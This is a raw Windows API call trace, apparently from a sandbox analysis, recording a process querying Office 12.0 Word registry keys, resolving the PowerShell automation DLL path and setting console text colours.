[0086.268] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.268] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3c8) returned 0x0
[0086.268] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.268] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.268] RegOpenKeyExW (in: hKey=0x3c8, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.268] RegCloseKey (hKey=0x3c8) returned 0x0
[0086.268] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.269] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3c8) returned 0x0
[0086.269] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.269] RegQueryInfoKeyW (in: hKey=0x3c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x0) returned 0x2
[0086.269] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cbcc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cbcc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cbc8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3cc) returned 0x0
[0086.269] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.269] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.269] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.269] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.269] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.270] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.270] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.271] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.271] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.271] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3cc) returned 0x0
[0086.271] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.271] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.271] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.271] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.271] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cca8 | out: phkResult=0x1c81cca8*=0x3cc) returned 0x0
[0086.272] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbc8 | out: phkResult=0x1c81cbc8*=0x3cc) returned 0x0
[0086.272] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbe8 | out: phkResult=0x1c81cbe8*=0x3cc) returned 0x0
[0086.272] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cad8 | out: phkResult=0x1c81cad8*=0x0) returned 0x2
[0086.272] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c9fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c9fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.272] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cad8 | out: phkResult=0x1c81cad8*=0x3cc) returned 0x0
[0086.272] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c9fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c9fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.272] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cad8 | out: phkResult=0x1c81cad8*=0x3a4) returned 0x0
[0086.273] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.273] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c9fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c9fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.273] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cad8 | out: phkResult=0x1c81cad8*=0x3cc) returned 0x0
[0086.273] RegCloseKey (hKey=0x3a4) returned 0x0
[0086.273] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c9fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c9fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.273] RegOpenKeyExW (in: hKey=0x3cc, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cad8 | out: phkResult=0x1c81cad8*=0x3a4) returned 0x0
[0086.273] RegCloseKey (hKey=0x3cc) returned 0x0
[0086.273] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c9fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c9fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.273] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cad8 | out: phkResult=0x1c81cad8*=0x3cc) returned 0x0
[0086.273] RegCloseKey (hKey=0x3a4) returned 0x0
[0086.273] RegQueryInfoKeyW (in: hKey=0x3cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c9fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c9fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c9f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.273] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbb8 | out: phkResult=0x1c81cbb8*=0x0) returned 0x2
[0086.273] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cadc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cad8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cadc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cad8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.273] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbb8 | out: phkResult=0x1c81cbb8*=0x3a4) returned 0x0
[0086.274] RegQueryInfoKeyW (in: hKey=0x3a4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cadc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cad8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cadc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cad8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.274] RegOpenKeyExW (in: hKey=0x3a4, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81cbb8 | out: phkResult=0x1c81cbb8*=0x3d0) returned 0x0
[0086.274] RegCloseKey (hKey=0x3a4) returned 0x0
[0086.274] RegQueryInfoKeyW (in: hKey=0x3d0, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81cadc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cad8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81cadc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81cad8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.276] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c81c6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818af0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818af0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818a00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c8189b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1c818900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0086.370] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
[0086.370] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0xc) returned 1
[0086.371] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
[0086.372] SetConsoleTextAttribute (hConsoleOutput=0x23, wAttributes=0x7) returned 1
[0086.374] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
[0086.374] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0xc) returned 1
[0086.375] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
[0086.376] SetConsoleTextAttribute (hConsoleOutput=0x2f, wAttributes=0x7) returned 1
[0086.378] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
[0086.378] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0xc) returned 1
[0086.379] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
[0086.380] SetConsoleTextAttribute (hConsoleOutput=0x3b, wAttributes=0x7) returned 1
[0086.382] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
[0086.382] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0xc) returned 1
[0086.383] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
[0086.384] SetConsoleTextAttribute (hConsoleOutput=0x47, wAttributes=0x7) returned 1
[0086.386] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
[0086.386] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0xc) returned 1
[0086.387] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
[0086.388] SetConsoleTextAttribute (hConsoleOutput=0x53, wAttributes=0x7) returned 1
[0086.390] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
[0086.390] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0xc) returned 1
[0086.391] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
[0086.392] SetConsoleTextAttribute (hConsoleOutput=0x5f, wAttributes=0x7) returned 1
[0086.394] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
[0086.395] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0xc) returned 1
[0086.396] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
[0086.396] SetConsoleTextAttribute (hConsoleOutput=0x6b, wAttributes=0x7) returned 1
[0086.398] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
[0086.399] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0xc) returned 1
[0086.400] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
[0086.400] SetConsoleTextAttribute (hConsoleOutput=0x77, wAttributes=0x7) returned 1
[0086.402] SetConsoleTextAttribute (hConsoleOutput=0x83, wAttributes=0xc) returned 1
